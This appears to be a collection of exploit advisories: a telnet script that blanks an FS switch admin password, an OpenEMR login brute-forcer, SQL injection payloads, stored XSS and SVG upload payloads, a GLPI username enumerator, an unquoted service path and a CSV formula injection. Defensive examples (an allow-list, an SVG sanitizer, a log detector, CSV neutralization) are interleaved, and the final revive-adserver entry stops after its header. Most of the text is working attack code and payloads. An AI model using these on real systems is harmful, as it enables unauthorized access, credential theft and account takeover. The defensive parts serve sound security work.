<pre><code># Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350

import sys
import telnetlib  # deprecated; removed from the standard library in Python 3.13


def exploit(args):
    print(args)
    if len(args) != 1:
        print(f"Usage: {sys.argv[0]} <ip>")
        sys.exit(1)
    else:
        ip = args[0]
        try:
            with telnetlib.Telnet(ip, 23) as tn:
                try:
                    # Log in with the default low-privilege guest account
                    tn.read_until(b"Username: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b">")
                    # Enter privileged mode with the default enable password
                    tn.write(b"enable\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"super\r\n")
                    tn.read_until(b"#")
                    # Clear the admin account's password from configuration mode
                    tn.write(b"configure terminal\r\n")
                    tn.read_until(b"(config)#")
                    tn.write(b"username admin nopassword\r\n")
                    tn.read_until(b"(config)#")
                    print(
                        "Exploit success, you can now login with username: admin and password: <empty>")
                    tn.close()
                except KeyboardInterrupt:
                    print("Exploit failed")
                    tn.close()
        except ConnectionRefusedError:
            print("Connection refused")


if __name__ == "__main__":
    exploit(sys.argv[1:])
</code></pre>
<pre><code># Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force
# Date: 2023-04-28
# Exploit Author: abhhi (Abhishek Birdawade)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz
# Version: 7.0.1
# Tested on: Windows

'''
Example Usage:
- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt
'''

import requests
import sys
import argparse, textwrap
from pwn import *  # provides log (info/success/progress)

# Expected Arguments
parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))

parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)")
parser.add_argument("-u","--username", help="Username to Bruteforce for.")
parser.add_argument("-ul","--userlist", help="Username Dictionary")
parser.add_argument("-p","--passlist", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
    print("Exploit Usage: python3 exploitBF.py -h")
    sys.exit(1)

# Variable
LoginPage = args.url
Username = args.username
Username_list = args.userlist
Password_list = args.passlist

log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')

def login(Username,Password):
    # A fresh session per attempt: the login form is fetched first so the server sets its cookies
    session = requests.session()
    r = session.get(LoginPage)

    # Progress Check
    process = log.progress('Brute Force')

    # Specifying Headers Value
    headerscontent = {
        'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Referer' : f"{LoginPage}",
        'Origin' : f"{LoginPage}",
    }

    # POST REQ data
    postreqcontent = {
        'new_login_session_management' : 1,
        'languageChoice' : 1,
        'authUser' : f"{Username}",
        'clearPass' : f"{Password}"
    }

    # Sending POST REQ (redirects are not followed: the Location header is the success signal)
    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)

    # Printing Username:Password
    process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))

    # Conditional loops: a successful login redirects to the main tabs page
    if 'Location' in r.headers:
        if "/interface/main/tabs/main.php" in r.headers['Location']:
            print()
            log.info('SUCCESS !!')
            log.success(f"Use Credential -> {Username}:{Password}")
            sys.exit(0)

# Reading User.txt & Pass.txt files
passfile = [line.strip() for line in open(Password_list).readlines()]
if Username_list:
    usernames = [line.strip() for line in open(Username_list).readlines()]
else:
    usernames = [Username]

# Every username from -u / -ul is tried against every password from -p
for Username in usernames:
    for Password in passfile:
        login(Username, Password)
</code></pre>
<pre><code># Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Request ###

GET /simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 HTTP/1.1
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/simplecms/preview.php?lid=1
Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; _fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; pjd_simplecms=1; last_position=%2F
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

### Parameter & Payloads ###

Parameter: column (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: action=pjActionGetFile&column=2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10
</code></pre>
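Added example (not part of the advisory and not PHPJabbers' code): the defensive counterpart to the sqlmap output above. A sort column that arrives in a query parameter cannot be bound as a placeholder, so it has to be compared against an allow-list of exact column names before it is interpolated into ORDER BY; only the paging values can be bound. The `files` table, its columns and the function names are assumptions made for this illustration, and the block runs against an in-memory SQLite database.

```python
import sqlite3

# Assumptions (not PHPJabbers' real schema or code): a "files" table stands in
# for the CMS's file listing, and the request's "column" / "direction" /
# "rowCount" / "page" parameters map onto ORDER BY, LIMIT and OFFSET.
SORTABLE_COLUMNS = {"id", "name", "created", "size"}
DIRECTIONS = {"ASC", "DESC"}
MAX_ROW_COUNT = 100

# The advisory's boolean-based payload, kept only to show it never reaches SQL.
BOOLEAN_PAYLOAD = "(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))"


def build_listing_query(column, direction, row_count=10, page=0):
    """Return (sql, params) for the file listing.

    Identifiers in ORDER BY cannot be bound as parameters, so the sort column
    and direction are checked against a fixed allow-list of exact strings and
    only the allow-listed spelling is interpolated; paging values are bound.
    """
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    direction = direction.upper()
    if direction not in DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    if not (1 <= row_count <= MAX_ROW_COUNT) or page < 0:
        raise ValueError("paging values out of range")
    sql = (f"SELECT id, name, created, size FROM files "
           f"ORDER BY {column} {direction} LIMIT ? OFFSET ?")
    return sql, (row_count, page * row_count)


def fetch_files(conn, column, direction, row_count=10, page=0):
    sql, params = build_listing_query(column, direction, row_count, page)
    return conn.execute(sql, params).fetchall()


def rejects_sort_input(conn, value):
    """True when `value` is refused by the allow-list before any SQL runs."""
    try:
        fetch_files(conn, value, "DESC")
    except ValueError:
        return True
    return False


def demo_connection():
    """In-memory SQLite table filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT, created TEXT, size INTEGER)")
    conn.executemany(
        "INSERT INTO files (name, created, size) VALUES (?, ?, ?)",
        [("a.txt", "2023-04-01", 10), ("b.txt", "2023-04-15", 20), ("c.txt", "2023-04-29", 30)],
    )
    return conn


if __name__ == "__main__":
    conn = demo_connection()
    print(fetch_files(conn, "created", "DESC"))
    print("boolean payload rejected:", rejects_sort_input(conn, BOOLEAN_PAYLOAD))
```

The allow-list is deliberately a set of literal strings rather than a regular expression: anything that is not exactly one of the known column names, including the advisory's error-based `2 AND EXTRACTVALUE(...)` variant, is refused before a query is built.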
<pre><code># Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Steps to Reproduce ###

- Log in at this address:
https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
- Click on the "Add Section" button.
- Enter the payload ("><img src=x onerror=alert("Stored")>) in the "Section" box and save it.
- Boom! An alert message saying "Stored" appears.

### PoC Request ###

POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate HTTP/1.1
Host: localhost
Cookie: pj_sid=PJ1.0.6199026527.1682777172; pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; pjd=7l9bb4ubmknrdbns46j7g5cqn7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Origin: https://localhost
Referer: https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T
</code></pre>
<pre><code>Exploit Title: PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)
Application: PHPFusion
Version: 9.10.30
Bugs: XSS
Technology: PHP
Vendor URL: https://www.php-fusion.co.uk/home.php
Software Link: https://sourceforge.net/projects/php-fusion/
Date found: 28-04-2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
Steps:

1. Go to the Fusion file manager (http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553#elf_l1_Lw)
2. Upload a malicious SVG file

SVG file content ===>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>


PoC request:


POST /PHPFusion%209.10.30/files/includes/elFinder/php/connector.php?aid=ecf01599cf9cd553 HTTP/1.1
Host: localhost
Content-Length: 1198
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxF2jB690PpLWInAA
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/PHPFusion%209.10.30/files/administration/file_manager.php?aid=ecf01599cf9cd553
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fusion2847q_lastvisit=1682673668; fusion2847q_user=1.1682850094.7126692a74723afe3bc7e3fb130a60838c1aa1bcae83f7497402ce9f009f96ff; fusion2847q_admin=1.1682850118.14c483fed28d5a89734c158bbb9aa88eab03a5c4a97316c372dd3b2591d6982a; fusion2847q_session=q0ifs4lhqt9fm6h3jclbea79vf; fusion2847q_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0
Connection: close

------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="reqid"

187c77be8e52cf
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="cmd"

upload
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="target"

l1_Lw
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="hashes[l1_U1ZHX1hTUy5zdmc]"

SVG_XSS.svg
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="mtime[]"

1681116842
------WebKitFormBoundaryxF2jB690PpLWInAA
Content-Disposition: form-data; name="overwrite"

0
------WebKitFormBoundaryxF2jB690PpLWInAA--


3. Then go to Images (http://localhost/PHPFusion%209.10.30/files/administration/images.php?aid=ecf01599cf9cd553) or open the SVG file directly (http://localhost/PHPFusion%209.10.30/files/images/SVG_XSS.svg)



PoC video: https://youtu.be/6yBLnRH8pOY
</code></pre>
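Added example (not from this advisory, the PHPJabbers Simple CMS advisory above, or either vendor's code): two output-side controls for the stored XSS both advisories demonstrate. `sanitize_svg` parses an uploaded SVG with the standard library and strips script elements, `on*` event-handler attributes and `javascript:` hrefs before the file is stored or served; `escape_for_html` is the output encoding a stored text field such as the CMS section name needs when it is written into HTML. The element and scheme lists, the function names and the sample SVG (the advisory's file plus an event attribute and a script link) are constructed for this illustration.

```python
import html
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that can run script or embed foreign content inside an SVG, and URL
# schemes that turn an href into code. Assumption: this is the deny-list form;
# an allow-list of pure drawing elements would be stricter.
DANGEROUS_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")


def _local(tag):
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return tag.rsplit("}", 1)[-1]


def sanitize_svg(svg_bytes):
    """Parse an uploaded SVG and strip script elements, on* event handlers and
    script-scheme hrefs. Returns the re-serialized document as bytes.
    Raises ValueError if the upload is not well-formed XML or its root is not <svg>."""
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed XML: {exc}") from exc
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    # Snapshot the tree first: removing children while iterating would skip nodes.
    for element in list(root.iter()):
        for child in list(element):
            if _local(child.tag) in DANGEROUS_ELEMENTS:
                element.remove(child)
        for attr in list(element.attrib):
            name = _local(attr).lower()
            value = element.attrib[attr].strip().lower()
            if name.startswith("on") or value.startswith(DANGEROUS_SCHEMES):
                del element.attrib[attr]
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def escape_for_html(text):
    """Output-encode a stored text field (a CMS section name, say) before it is
    written into HTML or an attribute value. quote=True also converts the double
    quote that the "><img ...> pattern relies on to break out of an attribute."""
    return html.escape(text, quote=True)


# Constructed sample: the advisory's SVG plus an on* attribute and a
# javascript: link so that the attribute rules are exercised as well.
SAMPLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.location)">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <a xlink:href="javascript:alert(1)"><text x="10" y="20">link</text></a>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
"""

if __name__ == "__main__":
    print(sanitize_svg(SAMPLE_SVG).decode())
    print(escape_for_html('"><img src=x onerror=alert("Stored")>'))
```

Sanitization limits what an uploaded file can do; serving uploads from a separate origin or with `Content-Disposition: attachment` limits what it can reach if something slips through, so the two are used together. In production the parser would be `defusedxml` rather than the stdlib one; the stdlib is used here so the block runs without dependencies.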
<pre><code># Exploit Title: GLPI 9.5.7 - Username Enumeration
# Date: 04/29/2023
# Author: Rafael B.
# Vendor Homepage: https://glpi-project.org/pt-br/
# Affected Versions: GLPI version 9.1 <= 9.5.7
# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz


import requests
from bs4 import BeautifulSoup

# Send a GET request to the page to receive the csrf token and the cookie session
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')

# Parse the HTML using BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')

# Find the input element with the CSRF token
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})

# Extract the CSRF token if it exists
csrf_token = None
if csrf_input:
    csrf_token = csrf_input['value']

# Extract the session cookie
session_cookie_value = None
if response.cookies:
    session_cookie_value = next(iter(response.cookies.values()))

# Set the custom url where the GLPI recover password is located
url = "http://127.0.0.1:80/glpi/front/lostpassword.php"
headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}

# Open the email list file and read each line
with open('emails.txt', 'r') as f:
    email_list = f.readlines()

# Loop through the email list and make a POST request for each email
for email in email_list:
    email = email.strip()
    data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token}
    cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value}
    freq = requests.post(url, headers=headers, cookies=cookies, data=data)

    # Do a new GET request to get the updated CSRF token and session cookie for the next iteration
    response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
    soup = BeautifulSoup(response.content, 'html.parser')
    csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
    if csrf_input:
        csrf_token = csrf_input['value']
    session_cookie_value = None
    if response.cookies:
        session_cookie_value = next(iter(response.cookies.values()))

    # Parse the response and pick out the e-mails the server acknowledged
    soup = BeautifulSoup(freq.content, 'html.parser')
    div_center = soup.find('div', {'class': 'center'})
    if div_center is None:
        continue
    Result = (f"Email: {email}, Result: {div_center.text.strip()}")
    # The server's message differs for known and unknown addresses, which is the enumeration oracle
    if "An email has been sent to your email address. The email contains information for reset your password." in Result:
        print("\033[1;32m Email Found! -> " + Result)
</code></pre>
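Added detection example (not part of the GLPI advisory above or the OpenEMR advisory earlier on this page): both scripts show up in the web server's access log as a burst of POSTs from one client to a single endpoint, so one rule covers both. The code below parses combined-format access-log lines, keeps a sliding window per source IP and watched endpoint, and raises one alert per pair when the count inside the window exceeds a threshold. The log lines, the threshold, the window and the rule names are constructed for this illustration; the two endpoint paths are the ones the advisories use.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" log format; only the fields the rule needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Endpoints from the two advisories, mapped to a rule name. Assumption: these
# are the only watched paths; a real deployment adds its own login/reset URLs.
WATCHED_PATHS = {
    "/interface/main/main_screen.php": "openemr_login_burst",
    "/glpi/front/lostpassword.php": "glpi_lostpassword_burst",
}


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop the query string
        "status": int(m["status"]),
    }


def detect_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window rule: alert once per (ip, rule) when a source IP sends more
    than `threshold` POSTs to a watched endpoint inside `window`.
    Lines must be in time order, as a log file normally is."""
    recent = defaultdict(deque)     # (ip, rule) -> timestamps still inside the window
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] not in WATCHED_PATHS:
            continue
        key = (ev["ip"], WATCHED_PATHS[ev["path"]])
        q = recent[key]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"ip": key[0], "rule": key[1], "count": len(q),
                           "first": q[0].isoformat(), "last": ev["ts"].isoformat()})
    return alerts


# Constructed sample log: one client hammering the OpenEMR login form, one
# client making two legitimate password-reset requests minutes apart, and one
# client submitting the GLPI lost-password form in quick succession.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Apr/2023:10:00:01 +0000] "GET /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5123
198.51.100.7 - - [29/Apr/2023:10:00:02 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5123
198.51.100.7 - - [29/Apr/2023:10:00:03 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5123
198.51.100.7 - - [29/Apr/2023:10:00:04 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5123
198.51.100.7 - - [29/Apr/2023:10:00:05 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5123
198.51.100.7 - - [29/Apr/2023:10:00:06 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 5123
198.51.100.7 - - [29/Apr/2023:10:00:07 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 302 0
203.0.113.5 - - [29/Apr/2023:10:01:00 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 2210
203.0.113.5 - - [29/Apr/2023:10:06:30 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 2210
203.0.113.9 - - [29/Apr/2023:10:10:00 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 2210
203.0.113.9 - - [29/Apr/2023:10:10:04 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 2210
203.0.113.9 - - [29/Apr/2023:10:10:09 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 2210
203.0.113.9 - - [29/Apr/2023:10:10:13 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 2210
203.0.113.9 - - [29/Apr/2023:10:10:20 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 2210
203.0.113.9 - - [29/Apr/2023:10:10:26 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 2210
"""

if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_LOG.splitlines()):
        print(alert)
```

The rule keys on the path without its query string, so the OpenEMR login page's `?auth=login&site=default` does not split one client's attempts into separate counters. For the lost-password form the server-side fix is to return the same message whether or not the address exists; the rule above is the compensating detection while that fix is pending.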
<pre><code># Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path
# Date: 2023-04-23
# CVE: CVE-2023-2417
# Exploit Author: MrEmpy
# Vendor Homepage: https://www.ks-soft.net
# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm
# Version: > 12.56
# Tested on: Windows 10 21H2


Title:
================
Advanced Host Monitor > 12.56 - Unquoted Service Path


Summary:
================
An unquoted service path vulnerability has been discovered in Advanced Host
Monitor version > 12.56, affecting the executable
"C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe". The vulnerability
occurs when the service's path is misconfigured, allowing an attacker to run
a malicious file instead of the legitimate executable associated with the
service.

An attacker with local user privileges could exploit this vulnerability by
placing a malicious file with the same name as the legitimate
RMA-Win\rma_active.exe service executable in a directory that has a higher
priority than the legitimate directory. That way, when the service starts,
it runs the malicious file instead of the legitimate executable, allowing
the attacker to execute arbitrary code, gain unauthorized access to the
compromised system, or stop the service from functioning.

To exploit this vulnerability, an attacker would need local access to the
system and the ability to write and replace files on the system. The
vulnerability can be mitigated by correcting the service path so that the
full path of the executable is enclosed in quotation marks. Furthermore, it
is recommended that users keep software updated with the latest security
updates and limit physical and network access to their systems to prevent
malicious attacks.


Proof of Concept:
================

C:\>sc qc ActiveRMAService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveRMAService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KS Active Remote Monitoring Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
</code></pre>
<pre><code>Exploit Title: admidio v4.2.5 - CSV Injection
Application: admidio
Version: 4.2.5
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.admidio.org/
Software Link: https://www.admidio.org/download.php
Date found: 26.04.2023
Author: Mirabbas Ağalarov
Tested on: Windows


2. Technical Details & POC
========================================
Step 1. Log in as a user.
Step 2. Go to My profile (edit profile), set the postal code to =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2).
Step 3. If an admin exports the users as a CSV or Excel file, the CSV injection fires on the admin's computer and the calculator opens (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2).

Payload: =calc|a!z|

PoC video: https://www.youtube.com/watch?v=iygwj1izSMQ
</code></pre>
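Added example (not part of the advisory and not admidio's code): the export-side fix for CSV injection. Every exported cell is quoted, and a cell whose text would be interpreted as a formula gets a leading apostrophe so that the spreadsheet shows it as literal text; the `=calc|a!z|` payload from the advisory is among the constructed sample rows. The field names and the member records are assumptions made for this illustration.

```python
import csv
import io

# Characters that make a spreadsheet treat the cell as a formula (or, via a
# leading tab/CR, hide one); "=calc|a!z|" from the advisory starts with "=".
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Return the cell text with a leading apostrophe when it would otherwise be
    interpreted as a formula. The apostrophe is the spreadsheet's marker for
    'literal text'; the user's original value is preserved after it.
    Leading whitespace is looked past, since some spreadsheets trim it.
    Non-string values (numbers, None) pass through unchanged."""
    if not isinstance(value, str):
        return value
    if value.startswith(FORMULA_TRIGGERS) or value.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_users_csv(rows, fieldnames):
    """Serialize user records to CSV with every cell quoted and neutralized.
    QUOTE_ALL keeps embedded commas and quotes from breaking the layout; the
    apostrophe prefix keeps formulas from executing on the admin's machine."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({name: neutralize_cell(row.get(name, "")) for name in fieldnames})
    return buf.getvalue()


# Constructed member records (assumption: field names are illustrative, not admidio's).
SAMPLE_USERS = [
    {"last_name": "Doe", "first_name": "Alice", "postal_code": "10115"},
    {"last_name": "Mallory", "first_name": "Eve", "postal_code": "=calc|a!z|"},
    {"last_name": "O'Brien", "first_name": "Pat", "postal_code": "@SUM(1+1)"},
]
FIELDS = ["last_name", "first_name", "postal_code"]

if __name__ == "__main__":
    print(export_users_csv(SAMPLE_USERS, FIELDS))
```

The trade-off is that legitimate values beginning with one of the trigger characters, such as a phone number written as `+49 ...`, also receive the apostrophe; where a column is known to be numeric it is cleaner to validate it as a number at input time and export it unquoted.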
<pre><code>Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS)
Application: revive-adserver
Version: 5.4.1
Bugs: XSS
Technology: PHP
Vendor URL: https://www.revive-adserver.com/
Software Link: https://www.revive-adserver.com/download/
Date found: 31-03-2023
